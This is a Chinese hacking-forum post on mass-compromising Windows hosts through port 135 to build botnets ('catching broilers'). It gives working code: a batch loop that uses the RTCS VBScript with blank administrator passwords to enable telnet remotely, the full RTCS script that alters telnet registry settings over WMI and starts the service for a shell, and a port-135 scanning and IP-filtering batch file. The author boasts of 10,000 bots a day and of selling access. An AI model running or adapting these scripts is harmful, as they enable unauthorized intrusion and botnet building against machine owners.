關(guān)于135抓肉雞的分析最近好象135搞的很火熱 看見(jiàn)有人也把那個(gè)批量抓135肉雞的工具發(fā)出來(lái)了我也就說(shuō)下把 反正俺也不早就不用那鳥(niǎo)東西了 上次看了那個(gè)也說(shuō)一天抓1000只肉雞 由于我是開(kāi)快進(jìn)看的 沒(méi)仔細(xì)的看 我以為他是自動(dòng)登陸telnet 所以我就暈死了 應(yīng)為自動(dòng)登陸telnet我以前研究很多 我由于我批處理我學(xué)的不怎么樣也就會(huì)點(diǎn)皮毛就加了他 結(jié)果他一上來(lái)就開(kāi)口批量開(kāi)23賣2000RMB 人品啊 我倒 那鳥(niǎo)東西不清楚大家知道作者不 那是02年安全焦點(diǎn)的大哥寫的 我有RT整個(gè)全套代碼的 一萬(wàn)年前我就知道怎么批量開(kāi)23了 不廢話了先說(shuō)其他的把 后來(lái)一位大哥把他的RT整套腳本整合寫了一個(gè)RCMD1。05這個(gè)是目前的最新版好象 需要解決的問(wèn)題我詳細(xì)的說(shuō)一下把 首先要解決的就是批量開(kāi)23了 rtcs腳本（百度一下有下的找不到就是搜索水品問(wèn)題了） 里面的代碼如果懂VBS的朋友去看下 就是先用VBS遠(yuǎn)程連接主機(jī)的wmi服務(wù) 然后剩下的是開(kāi)啟和過(guò)認(rèn)證部分 以前有一篇文章分析過(guò)說(shuō)是作者寫的有一個(gè)小BUG 就是如果原來(lái)已經(jīng)開(kāi)啟的話可以直接轉(zhuǎn)到退出的 這里不多說(shuō)這個(gè)了 for /f "delims= " %%i in (nt.txt) do del %%i.bat
for /f "delims= " %%i in (nt.txt) do echo goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "shell">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo SecureCRT.EXE %%i&goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "error">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do start %%i.bat
exit 這個(gè)是我以前寫的一個(gè)批處理 有興趣的朋友可以看下 其實(shí)很簡(jiǎn)單 外面流傳的需要過(guò)濾23 我的不需要過(guò)濾23 有興趣的朋友可以看下 代碼正確性沒(méi)測(cè)試應(yīng)為我寫過(guò)好幾個(gè)版本現(xiàn)在已經(jīng)不記得哪個(gè)是可以用的了 但是思路很明顯的相信大家可以看明白 要解決的問(wèn)題二 我也嘗試了用腳本來(lái)實(shí)現(xiàn)先telnet ip 然后sendkey 后來(lái)發(fā)現(xiàn)問(wèn)題大大的 只能一個(gè)一個(gè)種植不能實(shí)現(xiàn)批量種植 后來(lái)朋友給冰冰批量 就是現(xiàn)在大家可以在外面找的版本 他很好的解決了批量登陸和自動(dòng)種植的問(wèn)題 調(diào)用輔助工具 設(shè)置登陸腳本然后自動(dòng)種植 但是我相信用的朋友一定知道有什么問(wèn)題 telnet認(rèn)證是很復(fù)雜的 此外容易出現(xiàn)提示丟失腳本的錯(cuò)誤 其他的不知道說(shuō)什么了 我今天上網(wǎng)給朋友搞東西 弄的累的要死 思路不是很清楚 我在總結(jié)下把 首先寫一個(gè)S掃描的BAT然后里面用FOR循環(huán)自動(dòng)整理IP 然后NT過(guò)濾 然后調(diào)用上面我發(fā)的批處理批量開(kāi)23 然后寫一個(gè)批處理直接調(diào)用輔助工具自動(dòng)登陸自動(dòng)種植 效果如何 大家詳細(xì)的去看動(dòng)畫(huà)就知道了 而后來(lái)我寫的一個(gè)版本 就很帥了 嘿嘿 保密中 應(yīng)為工具是給兄弟群共享的 他們有業(yè)務(wù)來(lái)著 如果我把東西發(fā)布了說(shuō)是會(huì)干掉我 怕怕 給會(huì)懂VBS的朋友說(shuō)一下把 引導(dǎo)一下思路 前面的掃描和和NT過(guò)濾還是一樣的不說(shuō)了 遠(yuǎn)程連接wmi大家可以看rtcs的腳本 關(guān)鍵地方就是下面了 難道遠(yuǎn)程連接到了wmi服務(wù)就只有開(kāi)telnet一條出路嗎 貌似wmi功能多多把 具體能干什么去看安焦點(diǎn)rtcs作者02年的文章把 目前我寫的腳本和所有的工具打包起來(lái)也才70多K 同時(shí)開(kāi)4個(gè)服務(wù)器一天抓1萬(wàn)只肉雞 信不信由你 相信大家都知道recton里有一個(gè)http種植者的功能把 去找找文章看人家怎么實(shí)現(xiàn)的 最近風(fēng)聲很緊有業(yè)務(wù)的朋友最好小心 最近的通道不是那么安全 這個(gè)是rtcs的代碼 自己保存成VBS on error resume next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
if password=chr(34)&chr(34) then password=NULL
if ntlm<0 or ntlm>2 then
usage()
wscript.echo "The value of NTML is wrong."
wscript.quit
end if usage()
wscript.echo "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
showerror(err.number) wscript.echo "Setting NTLM="&ntlm&"...."
set objinstance=objswbemservices.get("stdregprov")
set objmethod=objinstance.methods_("SetDWORDvalue")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Setting port="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Querying state of telnet server...."
set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")
for each objinstance in colinstances
if objinstance.startmode="Disabled" then
wscript.echo "Telnet server has been disabled. Now changeing start mode to manual...."
set objmethod=objinstance.methods_("changestartmode")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
set objoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo "Changeing state...."
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo "Target telnet server has been STOP Successfully."
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo "Target telnet server has been START Successfully!"
wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."
end if
next function showerror(errornumber)
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
else
wscript.echo "OK!"
end if
end function function usage()
wscript.echo "************************************************************************"
wscript.echo "RTCS v1.08"
wscript.echo "Remote Telnet Configure Script, by zzzevazzz"
wscript.echo "Welcome to visite www.isgrey.com"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password NTLMAuthor telnetport"
wscript.echo "It will auto change state of target telnet server."
wscript.echo "************************************************************************"
end function 經(jīng)典吧，呵呵，我覺(jué)得，呵呵，管理員要給我加錢啊，呵呵
關(guān)于for循環(huán) 我解釋下 for /f這個(gè)這個(gè)參數(shù)表示對(duì)文本操作 tokens表示截取 tokens=1,2表示選取1，2兩個(gè)部分 eol表示忽略 eol=-表示忽略-開(kāi)始的行 delims表示分割符 delims=,表示對(duì)每行以“，”為分割符號(hào)對(duì)行進(jìn)行分割字符 那么我給大家寫一個(gè)S掃描自動(dòng)整理IP的批處理把 s.bat setlocal
cls
color A
title 自動(dòng)抓雞v1.0
echo ======================================================
echo 自動(dòng)抓雞v1.0
echo 作者：hurrytigar
echo QQ:30144942
echo emil:hurrytigar@163.com
echo hacked by hurrytigar
echo ======================================================
del result.txt
del s.txt
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
del s1.txt
del s2.txt
del Result.txt 掃描那行的FOR循環(huán) for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
意思是說(shuō) 從ip.txt中對(duì)每行以空格分割 然后取得分割后的第一部分和第二部分字符 第一個(gè)%%i是形參 代替你要取出來(lái)的部分 那么后面的2個(gè)部分的%%i 和%%j表示取出的兩個(gè)部分按順序代替的參數(shù)了 后面的幾行都是掃描完成的result過(guò)濾整理 先忽略以空格 - P S開(kāi)頭的行 然后用echo寫入文本來(lái)轉(zhuǎn)的 用法 大家把上面的批處理代碼保存成 s.bat然后在同一目錄建立一個(gè)ip.txt的文本 然后把下面的這些復(fù)制進(jìn)IP。TXT里面 （不需要整理 直接全放進(jìn)去 漢字不需要去掉） 掃描和整理結(jié)束以后會(huì)有一個(gè)S。TXT文本 自己打開(kāi)看看效果把 ^_^ 忘了說(shuō)了把s.exe ip.txt和s.bat放在同一目錄 好了我閃了.

最新評(píng)論